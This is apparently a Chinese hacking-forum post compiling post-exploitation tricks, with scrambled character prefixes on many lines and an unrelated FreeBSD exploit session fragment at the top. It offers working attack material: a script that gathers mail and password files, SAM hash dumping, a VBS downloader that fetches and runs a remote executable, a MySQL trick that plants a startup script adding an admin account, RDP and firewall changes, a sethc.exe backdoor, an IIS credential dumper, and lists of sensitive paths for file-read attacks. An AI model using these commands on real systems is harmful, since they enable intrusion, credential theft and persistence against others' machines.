, \/ B; S+ d2 i* freebsd 7.3-RELEASE GENERIC
. n% A: y3 d; f* [argp@julius ~]$ sysctl vfs.usermount
( M' M9 V( x, e7 Y3 h" e: z  k* vfs.usermount: 1
* [argp@julius ~]$ id
4 R; b( v& u, {% X" e9 n3 e* uid=1001(argp) gid=1001(argp) groups=1001(argp)
! F) z7 v; C' }3 L: ~( {* [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex
) B8 V$ w8 c8 X8 O6 Z" @$ ~) p, g* [argp@julius ~]$ ./nfs_mount_ex
& T- \) v/ e& v: c" k- f*
calling nmount()
" w0 V% w' b1 O& l
* Z+ Y/ x$ {6 z4 K7 o. N/ Y% |（注：本文原件由0x童鞋收集整理，感谢0x童鞋，本人补充和优化了点，本文毫无逻辑可言，因为是想到什么就写了，大家见谅）
6 g+ \% a  h+ x4 B4 Z# R8 k——————————————
2 r* ^8 W! i2 ?9 \  x感谢T00LS的童鞋们踊跃交流，让我学到许多经验，为了方便其他童鞋浏览，将T00LS的童鞋们补充的贴在下面，同时我也会以后将自己的一些想法跟新在后面。
————————————————————————————
1、tar打包            tar -cvf /home/public_html/*.tar /home/public_html/--exclude= 排除文件*.gif   排除目录 /xx/xx/*
alzip打包(韩国) alzip -a D:\WEB\ d:\web\*.rar
{
# }  M# e2 h1 h注：
6 C5 h" d; }+ f" E- _" h3 j! F) K关于tar的打包方式,linux不以扩展名来决定文件类型。
若压缩的话tar -ztf *.tar.gz   查看压缩包里内容     tar -zxf *.tar.gz 解压
那么用这条比较好 tar -czf /home/public_html/*.tar.gz /home/public_html/--exclude= 排除文件*.gif   排除目录 /xx/xx/*
* G3 }4 G8 @1 a# t7 f}  

( h0 d- }4 ^: l( v% l提权先执行systeminfo
token 漏洞补丁号 KB956572
/ ?! `+ o4 C! ^0 c+ X# rChurrasco          kb952004
命令行RAR打包~~·
rar a -k -r -s -m3 c:\1.rar c:\folder
——————————————
2、收集系统信息的脚本  
for window：
; u3 ?& {, Q: X6 {9 F! E
@echo off
echo #########system info collection
systeminfo
ver
hostname
net user
net localgroup
9 C! L# Z7 O* C$ O' v& Y# c3 ^0 |net localgroup administrators
1 ~0 g6 R! {0 Z0 l  j/ i  S  lnet user guest
4 o$ P3 x1 C" v, Ynet user administrator
/ P5 H6 S4 ?% E
+ d4 X% y1 t' O% T( _. |% G1 l( R* aecho #######at- with   atq#####
/ G' m$ R7 _. z9 s& Necho schtask /query
' o* c- r$ b( @" t
+ d+ [/ X/ ?% Pecho
% @- ]; Y; }) }echo ####task-list#############
: F$ m9 V3 t  w0 b8 ttasklist /svc
: X6 I8 @' J8 l, W' J' C' recho
! ]6 L  D5 ?. F5 R* T& e8 q$ pecho ####net-work infomation
ipconfig/all
route print
% Y6 |5 j( N4 H3 [arp -a
netstat -anipconfig /displaydns
0 L0 D3 L- _  Z1 K2 N0 |9 kecho
) Y# j: E1 `& {8 X. h6 n2 @1 \: ^echo #######service############
sc query type= service state= all
echo #######file-##############
cd \
/ H0 x: [& u: G- L  B9 Qtree -F
for linux：
+ w0 e* F# _+ k' s) X, k4 C9 E4 Z
- ~- s# J( x# S9 H% G8 H' e) C#!/bin/bash
; m/ o7 q$ E( u, ]& Y
* {% e6 r9 K- U5 Vecho #######geting sysinfo####
echo ######usage: ./getinfo.sh >/tmp/sysinfo.txt
4 X+ I& D& G" ?0 Hecho #######basic infomation##
( X8 k  E/ R/ ]" M! d, M( scat /proc/meminfo
4 S& g" d+ u6 ^" O$ v  t# l' @echo
3 Q/ Q% ?2 P& q. V; k: \cat /proc/cpuinfo
# }& n+ g1 w# o; ^6 C; decho
/ J3 ~' d4 A% w; drpm -qa 2>/dev/null
######stole the mail......######
7 ?& q! u3 q/ J1 g& Jcp -a /var/mail /tmp/getmail 2>/dev/null
3 t5 g# M; c0 X& y0 i. M5 `
% E8 \$ p* g" J, ]6 Y
echo 'u'r id is' `id`
( J( Z6 r) h' s' q1 aecho ###atq&crontab#####
atq
crontab -l
echo #####about var#####
0 w# @+ v8 y! Vset
+ t# {: o- Z$ N
3 }7 v# L  h; T( i. Fecho #####about network###
####this is then point in pentest,but i am a new bird,so u need to add some in it
cat /etc/hosts
hostname
/ ^3 j* q" v& e. X/ F3 e& ripconfig -a
arp -v
echo ########user####
cat /etc/passwd|grep -i sh

  _8 P3 v* i; a, [; `8 s2 B0 Cecho ######service####
chkconfig --list
/ B5 |; y) B6 P& q
$ m: f: n4 d; s' B% [0 Zfor i in {oracle,mysql,tomcat,samba,apache,ftp}
cat /etc/passwd|grep -i $i
done
- v9 Y9 m& |- b. N/ f+ r9 ]
locate passwd >/tmp/password 2>/dev/null
9 g0 P) |3 V0 Y2 b- f+ A5 Msleep 5
locate password >>/tmp/password 2>/dev/null
) c' l3 p6 t5 w! y1 n* a2 Y9 `sleep 5
locate conf >/tmp/sysconfig 2>dev/null
sleep 5
# C/ ^" H. r2 ~/ ilocate config >>/tmp/sysconfig 2>/dev/null
5 |5 K1 f' z  D; V% Ssleep 5

! i5 T4 V1 }# r$ L4 \###maybe can use "tree /"###
# H$ O( g( w" M( e( mecho ##packing up#########
tar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig
5 M# w- F3 x- wrm -rf /tmp/getmail /tmp/password /tmp/sysconfig
——————————————
5 s6 R9 H+ z/ j. X1 ?, K3、ethash 不免杀怎么获取本机hash。
5 O# a2 _# ^! q9 r8 N' p- p首先导出注册表 regedit /e d:\aa.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users"   （2000）
% B5 X+ H: G+ q0 f% ?2 f               reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users" d:\aa.reg  （2003）
' n$ ^! e# f& I5 |- o- }注意权限问题，一般注册表默认sam目录是不能访问的。需要设置为完全控制以后才可以访问（界面登录的需要注意，system权限可以忽略）
/ j7 Y+ F" P$ Y6 H/ N! ~6 k, T% h接下来就简单了，把导出的注册表，down 到本机，修改注册表头导入本机，然后用抓去hash的工具抓本地用户就OK了
+ t& i' K6 V; y' a! s# V8 _hash 抓完了记得把自己的账户密码改过来哦！
: t6 x% m. k7 B( G3 `" b( A4 T: Q据我所知，某人是用这个方法虚拟机多次因为不知道密码而进不去！~
" t( }; G# G8 z4 p) l8 {2 b——————————————
4、vbs 下载者
, u7 H1 Y# x! g! n' h" G1
/ r9 ?4 F& O2 H! K& {) @5 Yecho Set sGet = createObject("ADODB.Stream") >>c:\windows\cftmon.vbs
echo sGet.Mode = 3 >>c:\windows\cftmon.vbs
, a9 _! x6 C+ s, |7 N& B& {: T1 Decho sGet.Type = 1 >>c:\windows\cftmon.vbs
$ Y$ f& V  P. ~' h5 fecho sGet.Open() >>c:\windows\cftmon.vbs
& c# v! {- S+ aecho sGet.Write(xPost.responseBody) >>c:\windows\cftmon.vbs
echo sGet.SaveToFile "c:\windows\e.exe",2 >>c:\windows\cftmon.vbs
/ A. a9 A4 q: ?9 Cecho Set objShell = CreateObject("Wscript.Shell") >>c:\windows\cftmon.vbs
echo objshell.run """c:\windows\e.exe""" >>c:\windows\cftmon.vbs
cftmon.vbs
  m& K' @2 o$ G" Q
" U# ?. [* i8 f( x& [+ f. V2
* t! a/ u7 v+ X8 j. ?. nOn Error Resume Nextim iRemote,iLocal,s1,s2
; M- X. t! u: K7 H. V: |iLocal = LCase(WScript.Arguments(1)):iRemote = LCase(WScript.Arguments(0))  
s1="Mi"+"cro"+"soft"+"."+"XML"+"HTTP":s2="ADO"+"DB"+"."+"Stream"
2 W6 ~% i: i2 x1 K7 h# r1 Y8 n! QSet xPost = CreateObject(s1):xPost.Open "GET",iRemote,0:xPost.Send()
& t- g; V7 V- h' |Set sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open()
; _% B7 o6 M, A8 A2 BsGet.Write(xPost.responseBody):sGet.SaveToFile iLocal,2
2 c9 ^7 N9 _4 G1 |
* B5 `7 ~8 T& U; L' C, Lcscript c:\down.vbs http://xxxx/mm.exe c:\mm.exe
! I4 P  o2 x$ J- E" ]  _
当GetHashes获取不到hash时，可以用兵刃把sam复制到桌面
+ D, u3 {* m7 A$ n2 H5 H——————————————————
5、
1.查询终端端口
5 [; |4 ~- ~2 D& GREG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
* c  r# n0 R7 R, V  m5 u4 {2.开启XP&2003终端服务
  n1 w8 z( y/ k5 z, sREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
) Z& y7 z; U' T$ S, v3.更改终端端口为2008(0x7d8)
! L3 W  `2 z5 \6 KREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f
4.取消xp&2003系统防火墙对终端服务的限制及IP连接的限制
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled   xpsp2res.dll,-22009 /f
4 K% Y" z, I9 }) j% i————————————————
6、create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"")");
( h; W5 L% t; g' ~- O8 y& binsert into a values ("a=wshshell.run (""cmd.exe /c net user admin admin /add"",0)");
1 X1 e  o" z. y+ p+ v: e& {% h' b3 Pinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators admin /add"",0)");  
( B# O4 H  M5 R5 C8 g( N, wselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
————————————————————
: x9 I4 k. q7 M: i- N7、BS马的PortMap功能，类似LCX做转发。若果支持ASPX，用这个转发会隐蔽点。（注：一直忽略了在偏僻角落的那个功能）
_____
9 P, e9 T/ Q( H8、for /d %i in (d:\freehost\*) do @echo %i

% K/ ?/ C3 h7 }" O: w0 ~列出d的所有目录
+ k4 `! d( B  F9 w7 W3 y  
6 ]; ^! V. z8 T  for /d %i in (???) do @echo %i
, i" u. Z' x! k
把当前路径下文件夹的名字只有1-3个字母的打出来
& C' {' C# r. d5 g. Y
2.for /r %i in (*.exe) do @echo %i
  
以当前目录为搜索路径.会把目录与下面的子目录的全部EXE文件列出

for /r f:\freehost\hmadesign\web\ %i in (*.*) do @echo %i

3.for /f %i in (c:\1.txt) do echo %i
  
  //这个会显示a.txt里面的内容，因为/f的作用，会读出a.txt中

4.for /f "tokens=2 delims= " %i in (a.txt) do echo %i
- s' n  |8 u  U) V, M6 L
( l, H* _3 k" A5 K, n  delims=后的空格是分隔符 tokens是取第几个位置
——————————
●注册表:
* Z' }) y( D$ R" J9 ?8 t% l1.Administrator注册表备份:
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\1f4.reg

2.修改3389的默认端口:
: i) H0 I' ]  I, d0 |( _HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
' S" S3 n2 F2 }修改PortNumber.
, K6 ]9 K5 _* V  l- H
$ c1 g6 G* h& a7 B1 W9 C( T3.清除3389登录记录:
reg delete "HKCU\Software\Microsoft\Terminal Server Client"  /f

+ }1 B; }" ^4 l/ F+ T4.Radmin密码:
4 [- h- E6 G, Vreg export HKLM\SYSTEM\RAdmin c:\a.reg

5.禁用TCP/IP端口筛选(需重启):
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f

( }0 ?! x  d1 p8 P, I6.IPSec默认免除项88端口(需重启):
7 d2 U% m( S. K5 t8 l( freg add HKLM\SYSTEM\CurrentControlSet\Services\IPSEC /v NoDefaultExempt /t REG_DWORD /d 0 /f
- [, X! s2 l3 G5 i或者
netsh ipsec dynamic set config ipsecexempt value=0

+ Q* I4 ?. ^3 ^4 u( \  r7.停止指派策略"myipsec":
2 }5 t' s) W; h" X5 @3 r5 dnetsh ipsec static set policy name="myipsec" assign=n
7 z1 Y0 E! T7 h5 S
8.系统口令恢复LM加密:
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v LMCompatibilityLevel /t REG_DWORD /d 0 /f
5 p, |! Z: m6 E2 P3 Q
9.另类方法抓系统密码HASH
  Q, D  ?0 D5 O/ l0 f. Q5 breg save hklm\sam c:\sam.hive
+ C- c- e& U0 @9 D, d/ mreg save hklm\system c:\system.hive
reg save hklm\security c:\security.hive
; \. e8 a) B# ]. z
" C9 _6 K4 b0 `& U0 U; c10.shift映像劫持
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v debugger /t REG_sz /d cmd.exe

reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f
9 y+ c5 [& s- J' O0 s# E3 `1 C9 ~1 ?-----------------------------------
星外vbs(注：测试通过，好东西）
0 u: P7 E8 S7 {) C# lSet ObjService=GetObject("IIS://LocalHost/W3SVC")
For Each obj3w In objservice
childObjectName=replace(obj3w.AdsPath,Left(obj3w.Adspath,22),"")
4 @+ Z! |5 T$ |9 |, ^$ jif IsNumeric(childObjectName)=true then
set IIs=objservice.GetObject("IIsWebServer",childObjectName)
if err.number<>0 then
( }. T. X; G  l  D  q1 U, eexit for
$ E. w$ L! h" X/ b6 ]msgbox("error!")
% [; V% K$ A4 O: K1 P  ?wscript.quit
end if
/ A9 k: e: ~8 o" |! x% j! C- sserverbindings=IIS.serverBindings
( B: D. v8 c% F% E/ k* l) w( QServerComment=iis.servercomment
set IISweb=iis.getobject("IIsWebVirtualDir","Root")
user=iisweb.AnonymousUserName
pass=iisweb.AnonymousUserPass
path=IIsWeb.path
7 r! c  u# G* q! k) u3 Alist=list&servercomment&" "&user&" "&pass&" "&join(serverBindings,",")&" "&path& vbCrLf & vbCrLf
9 ~9 }3 G! L5 D7 e6 n+ j4 B* Gend if
# |& ]$ V6 [, v$ f: Q9 n, |9 C- s% FNext
. e+ V' ]  @  P3 C; v1 Y4 Jwscript.echo list
Set ObjService=Nothing
; y3 K. {* }9 _' |( m% I  h' U7 Qwscript.echo "from : http://www.xxx.com/" &vbTab&vbCrLf
' X% z" }$ i- b  f( q% qWScript.Quit
* B, O, e# n9 |, |& T! U. T7 Y复制代码
----------------------2011新气象，欢迎各位补充、指正、优化。----------------
1、Firefox的利用(主要用于内网渗透），火狐浏览器的密码储存在C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\文件夹，打包后，本地查看。或有很多惊喜~
2、win2k的htt提权（注：仅适合2k以及以下版本，文件夹不限,只读权限即可)
将folder.htt文件，加入以下代码：
' r1 l; K' B$ `+ o+ U4 W<OBJECT ID=RUNIT WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="cmd.exe">
. M- D% R! y  Q. R& ?</OBJECT>
复制代码
然后与desktop.ini、cmd.exe同一个文件夹。当管理打开该文件夹时即可运行。
PS：我N年前在邪八讨论过XP下htt提权，由于N年前happy蠕虫的缘故，2K以后都没有folder.htt文件，但是xp下的htt自运行各位大牛给个力~
asp代码，利用的时候会出现登录问题
- }# W" C/ b7 j( i9 `: h6 Z' Q 原因是ASP大马里有这样的代码：（没有就没事儿了）
0 N7 ?# `+ i1 @ url=request.severvariables("url")
" n+ K8 H' d! f8 a3 I& O 这里显示接收到的参数是通过URL来传递的，也就是说登录大马的时候服务器会解析b.asp，于是就出现了问题。
% `1 |( U3 |* X3 e6 H" v" q 解决方法
+ t7 r+ [" n5 H' O url=request.severvariables("path_info")
path_info可以直接呈现虚拟路径 顺利解析gif大马
' Y4 h+ D8 J" c% Z) E/ q( X0 h
$ p  ?4 w# z$ Z, ]/ v# |" c==============================================================
LINUX常见路径：
8 U- M1 \5 q, ?  o; n9 V
/etc/passwd
2 {5 g; o+ X" t* h8 s5 _. u/etc/shadow
/etc/fstab
0 \( f4 ^/ X, n* K" F/etc/host.conf
/etc/motd
# q  C! V4 I, o0 g% `/etc/ld.so.conf
( J+ ~) i. p- X8 f. ?( L/var/www/htdocs/index.php
/var/www/conf/httpd.conf
2 i" B2 N% Z1 r( e! N/var/www/htdocs/index.html
) W# }+ K+ i$ ?# o9 X" b/var/httpd/conf/php.ini
: i$ S' ~) A% o/var/httpd/htdocs/index.php
/var/httpd/conf/httpd.conf
/var/httpd/htdocs/index.html
; Q+ h; q7 S# y9 s/var/httpd/conf/php.ini
- b) H0 \4 ~, v" E! N2 R/var/www/index.html
6 d5 r8 o6 \& `3 R% k: I( ?/var/www/index.php
/opt/www/conf/httpd.conf
/opt/www/htdocs/index.php
. q; E# |. y; k5 E5 `& f% P* r/opt/www/htdocs/index.html
1 y6 l/ P* Y' y+ ?/usr/local/apache/htdocs/index.html
/usr/local/apache/htdocs/index.php
/usr/local/apache2/htdocs/index.html
/usr/local/apache2/htdocs/index.php
9 X8 K& a7 d7 a0 ^+ J0 k/usr/local/httpd2.2/htdocs/index.php
/usr/local/httpd2.2/htdocs/index.html
/tmp/apache/htdocs/index.html
( V. R' x" S8 ^: o3 Q  x/tmp/apache/htdocs/index.php
# p6 O7 x: ~+ Z/etc/httpd/htdocs/index.php
/etc/httpd/conf/httpd.conf
# u3 P' S* u, @3 t: E+ {- v/etc/httpd/htdocs/index.html
9 _: \# m* k9 G' U7 d/www/php/php.ini
! i5 e& W* X( X* B/www/php4/php.ini
) O' P) n6 _6 z3 E, n/www/php5/php.ini
, ~1 X5 o1 {! R" Q% `3 t" y/www/conf/httpd.conf
- {: @! b0 `& w" X. H# A: O& R! I/www/htdocs/index.php
! S1 m7 b+ f' D/www/htdocs/index.html
& X  l% N8 }, {9 o) c1 U- o" w/usr/local/httpd/conf/httpd.conf
0 q) ], F4 O) h9 l) ~' t6 ^/apache/apache/conf/httpd.conf
/apache/apache2/conf/httpd.conf
/etc/apache/apache.conf
6 ~+ B& l1 m/ h/ i8 D3 M. c' @7 ]/etc/apache2/apache.conf
/etc/apache/httpd.conf
/etc/apache2/httpd.conf
/etc/apache2/vhosts.d/00_default_vhost.conf
/etc/apache2/sites-available/default
/etc/phpmyadmin/config.inc.php
/etc/mysql/my.cnf
- l0 Q4 k/ ^' y0 m- I8 b7 _/etc/httpd/conf.d/php.conf
/etc/httpd/conf.d/httpd.conf
) c+ E! S# B' m# |" {& Q/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
; J. p2 N+ ?* f/etc/httpd/logs/access_log
. A# W( M) ]$ s' s; ^/etc/httpd/logs/access.log
: s& w4 o1 i5 G3 a0 k) ?/ |( g$ o0 H( D/home/apache/conf/httpd.conf
/home/apache2/conf/httpd.conf
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/apache/access_log
$ U7 W0 A+ C+ S: A' {6 ?/var/log/apache/access.log
7 T' K* Y% K" i: a4 D" f: t6 r/var/log/apache2/error_log
, {, o6 ~9 j: e1 m0 j/var/log/apache2/error.log
/var/log/apache2/access_log
9 L* u+ c+ H6 K  d5 A/var/log/apache2/access.log
/var/www/logs/error_log
& Q0 e9 U3 H) S' b. T9 u% @9 }/var/www/logs/error.log
7 Y6 `7 `$ C) }" H/var/www/logs/access_log
7 ^, S2 ^; d- m- f& ?9 x) A/var/www/logs/access.log
+ h0 y! Q/ F/ O& K; u3 R: i6 E/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/error_log
/var/log/error.log
/var/log/access_log
0 K; f3 S# f5 y# t  l7 W; d/var/log/access.log
+ m' o% P, m3 C; E/usr/local/apache/logs/access_logaccess_log.old
$ p' j% r' G) G! V! b  o/usr/local/apache/logs/error_logerror_log.old
/etc/php.ini
/bin/php.ini
2 q, H, C; ^- _  U, s/etc/init.d/httpd
/ P8 A( Z/ z% l( T* c/etc/init.d/mysql
; H$ p; @1 u- T3 H. L0 ]/etc/httpd/php.ini
/usr/lib/php.ini
: S  u- w- A3 f3 q* ~/ [/usr/lib/php/php.ini
, @+ c' M2 q( c* X0 Z8 X6 W5 [+ n* `/usr/local/etc/php.ini
: Q. z" b$ ~8 m% E. M. J! @  o8 h3 v/usr/local/lib/php.ini
/usr/local/php/lib/php.ini
/usr/local/php4/lib/php.ini
- d0 C8 u' s- ?3 X/usr/local/php4/php.ini
  b5 z1 w% Y8 Q" V/ m. g' ]. B/usr/local/php4/lib/php.ini
/usr/local/php5/lib/php.ini
0 j! f6 I3 X/ Z1 U( J7 m/usr/local/php5/etc/php.ini
/usr/local/php5/php5.ini
/usr/local/apache/conf/php.ini
/usr/local/apache/conf/httpd.conf
; H& I' T& n6 V/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/conf/php.ini
/etc/php4.4/fcgi/php.ini
: f* q" o3 o6 M0 b& s- K( A5 a2 A/etc/php4/apache/php.ini
1 ~7 g# b" |6 x  i! o/etc/php4/apache2/php.ini
6 M. [( ~4 U2 N/ ~/etc/php5/apache/php.ini
/etc/php5/apache2/php.ini
/etc/php/php.ini
9 n7 v3 }! c' T! T/etc/php/php4/php.ini
- X, Q, V8 ~; p" M. o/etc/php/apache/php.ini
% l8 X4 r$ I1 B" g* z/etc/php/apache2/php.ini
/web/conf/php.ini
- u, M( r* V2 u( U+ F/ _/usr/local/Zend/etc/php.ini
/opt/xampp/etc/php.ini
* ~( O/ D# H4 D# E# i/var/local/www/conf/php.ini
8 ~+ S+ v) A1 X# c, f/var/local/www/conf/httpd.conf
# Q% p  m5 {; `/etc/php/cgi/php.ini
) v& `$ c  X! a; S- a/etc/php4/cgi/php.ini
/etc/php5/cgi/php.ini
- H# Y& `* T- [& e- ]% v/php5/php.ini
/php4/php.ini
1 n/ B. i, n* n# O0 E7 C) d. f/php/php.ini
0 Y4 R! v# e2 |: V% _; @# W/PHP/php.ini
5 Z& ~9 J2 O6 }8 O& }! p/apache/php/php.ini
/xampp/apache/bin/php.ini
7 d: q& Q8 v9 r! C3 B/xampp/apache/conf/httpd.conf
/NetServer/bin/stable/apache/php.ini
/home2/bin/stable/apache/php.ini
3 Y, Y: w5 e$ h$ O3 O/home/bin/stable/apache/php.ini
/var/log/mysql/mysql-bin.log
0 g0 G* z; c; R; a2 U/var/log/mysql.log
- l  }4 t+ N( v* h" D/ ^6 ^9 M7 Y/var/log/mysqlderror.log
/var/log/mysql/mysql.log
3 a+ H. D+ r( }0 s$ u/var/log/mysql/mysql-slow.log
/var/mysql.log
/var/lib/mysql/my.cnf
/usr/local/mysql/my.cnf
/usr/local/mysql/bin/mysql
/etc/mysql/my.cnf
- `+ l% H7 B8 C4 S% Q1 ]/etc/my.cnf
5 a. E# O8 Z0 `! t) q" r/ m; q& W/usr/local/cpanel/logs
/usr/local/cpanel/logs/stats_log
1 c, H  ?/ I, E  \& `/usr/local/cpanel/logs/access_log
3 e! g# r, c& |! R" p/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/stats_log
# [4 O( K- E( b$ y/usr/local/share/examples/php4/php.ini
3 b- r  |# _  _4 n/usr/local/share/examples/php/php.ini

2 P; V' |7 ~, @8 Y, b' [2..windows常见路径（可以将c盘换成d,e盘,比如星外虚拟主机跟华众得,一般都放在d盘）
1 r3 e+ Z. ^, ~" t  {9 `/ _
- _1 [+ S. P6 P4 Q" v3 Y, @c:\windows\php.ini
c:\boot.ini
: w, C6 R- g6 N8 Q4 Y$ `c:\1.txt
  T; _8 T2 \. W$ g, mc:\a.txt

/ Q4 `# Q# w: m+ g# u3 L( _: L& }6 I" |c:\CMailServer\config.ini
c:\CMailServer\CMailServer.exe
4 I* n0 n  S1 ]; a; Cc:\CMailServer\WebMail\index.asp
c:\program files\CMailServer\CMailServer.exe
+ n, Y; o2 u6 j  N4 A& Zc:\program files\CMailServer\WebMail\index.asp
8 ^- T' _( Z( [* c! AC:\WinWebMail\SysInfo.ini
C:\WinWebMail\Web\default.asp
: U( {) v3 I, G2 L4 n0 qC:\WINDOWS\FreeHost32.dll
" U4 H, W) r, ^6 ZC:\WINDOWS\7i24iislog4.exe
C:\WINDOWS\7i24tool.exe

c:\hzhost\databases\url.asp
; g5 ^: Z- ~; b8 [% e" C/ _
* _: n2 y& w' G2 oc:\hzhost\hzclient.exe
C:\Documents and Settings\All Users\「开始」菜单\程序\7i24虚拟主机管理平台\自动设置[受控端].lnk

C:\Documents and Settings\All Users\「开始」菜单\程序\Serv-U\Serv-U Administrator.lnk
C:\WINDOWS\web.config
3 {8 ?! N, t" gc:\web\index.html
c:\www\index.html
c:\WWWROOT\index.html
c:\website\index.html
c:\web\index.asp
4 R+ h( r) D( ~" p% Mc:\www\index.asp
c:\wwwsite\index.asp
! V0 Z6 b# J" u1 Bc:\WWWROOT\index.asp
0 v; E$ z7 K, ]1 v0 Rc:\web\index.php
3 K4 b2 d" }% V5 v- O4 X/ Vc:\www\index.php
* d4 B9 W) i3 O. bc:\WWWROOT\index.php
c:\WWWsite\index.php
' L4 c& K2 U! S4 ~, c5 t/ _c:\web\default.html
7 f% I" y% |5 s! \1 @c:\www\default.html
c:\WWWROOT\default.html
& y1 d5 {! C3 e5 F2 H, Pc:\website\default.html
, N+ ^% k$ \$ d  g6 xc:\web\default.asp
1 I( b# Q/ C0 Wc:\www\default.asp
5 [# I5 R+ k$ v6 {( P  w/ I4 jc:\wwwsite\default.asp
c:\WWWROOT\default.asp
2 u+ M, w- M- k6 qc:\web\default.php
c:\www\default.php
c:\WWWROOT\default.php
' F# E- q$ w3 }7 p; }# {- ~c:\WWWsite\default.php
C:\Inetpub\wwwroot\pagerror.gif
c:\windows\notepad.exe
& }2 T% R& v8 V# }; h" Xc:\winnt\notepad.exe
) Q. p1 `1 R  u1 C3 Q9 x) ]# UC:\Program Files\Microsoft Office\OFFICE10\winword.exe
C:\Program Files\Microsoft Office\OFFICE11\winword.exe
; `( S) u5 P- }1 p1 hC:\Program Files\Microsoft Office\OFFICE12\winword.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
4 B, p% l+ e3 r8 M% Z( d1 qC:\Program Files\winrar\rar.exe
3 C3 r" ?$ v" U. ]4 rC:\Program Files\360\360Safe\360safe.exe
# s) C+ c. E, D, gC:\Program Files\360Safe\360safe.exe
C:\Documents and Settings\Administrator\Application Data\360Safe\360Examine\360Examine.log
0 f+ R- [# p% k5 c, F- ?c:\ravbin\store.ini
- S% }4 R3 \/ K' e2 D+ o4 E7 f) mc:\rising.ini
C:\Program Files\Rising\Rav\RsTask.xml
C:\Documents and Settings\All Users\Start Menu\desktop.ini
C:\Documents and Settings\Administrator\My Documents\Default.rdp
6 W+ [' Z% r- L5 Q1 j& QC:\Documents and Settings\Administrator\Cookies\index.dat
$ t) u3 ~/ X% GC:\Documents and Settings\Administrator\My Documents\新建 文本文档.txt
C:\Documents and Settings\Administrator\桌面\新建 文本文档.txt
C:\Documents and Settings\Administrator\My Documents\1.txt
/ U# C5 ~& _1 [7 Q+ d4 x) _C:\Documents and Settings\Administrator\桌面\1.txt
C:\Documents and Settings\Administrator\My Documents\a.txt
C:\Documents and Settings\Administrator\桌面\a.txt
C:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg
8 T1 N5 ~2 t9 g' K- ?) xE:\Inetpub\wwwroot\aspnet_client\system_web\1_1_4322\SmartNav.htm
C:\Program Files\RhinoSoft.com\Serv-U\Version.txt
C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
. V& b% ]! c) o; ~" C( {C:\Program Files\Symantec\SYMEVENT.INF
C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
% D2 l/ A  x" X' U  T. p0 Y8 u, VC:\Program Files\Microsoft SQL Server\MSSQL\Data\master.mdf
C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Data\master.mdf
1 z! b5 l- `% x: H6 {+ r2 OC:\Program Files\Microsoft SQL Server\MSSQL.2\MSSQL\Data\master.mdf
" `1 m1 r* ~# Q4 P) x6 GC:\Program Files\Microsoft SQL Server\80\Tools\HTML\database.htm
) w- o4 e* R& }; a+ z: KC:\Program Files\Microsoft SQL Server\MSSQL\README.TXT
4 z' O7 y# g- f" N8 @C:\Program Files\Microsoft SQL Server\90\Tools\Bin\DdsShapes.dll
3 K: B; E. B! n3 r- n! _" M8 iC:\Program Files\Microsoft SQL Server\MSSQL\sqlsunin.ini
+ @# n$ W4 P/ D; F8 NC:\MySQL\MySQL Server 5.0\my.ini
# T: m. d& J5 g0 \0 e8 WC:\Program Files\MySQL\MySQL Server 5.0\my.ini
5 I* Z3 d  `5 v. |C:\Program Files\MySQL\MySQL Server 5.0\data\mysql\user.frm
C:\Program Files\MySQL\MySQL Server 5.0\COPYING
C:\Program Files\MySQL\MySQL Server 5.0\share\mysql_fix_privilege_tables.sql
C:\Program Files\MySQL\MySQL Server 4.1\bin\mysql.exe
! [2 d" Q# h! J( k* s' Ec:\MySQL\MySQL Server 4.1\bin\mysql.exe
c:\MySQL\MySQL Server 4.1\data\mysql\user.frm
' t! J0 }" ^) F/ q, y: M- T1 q( IC:\Program Files\Oracle\oraconfig\Lpk.dll
C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe
C:\WINDOWS\system32\inetsrv\w3wp.exe
C:\WINDOWS\system32\inetsrv\inetinfo.exe
C:\WINDOWS\system32\inetsrv\MetaBase.xml
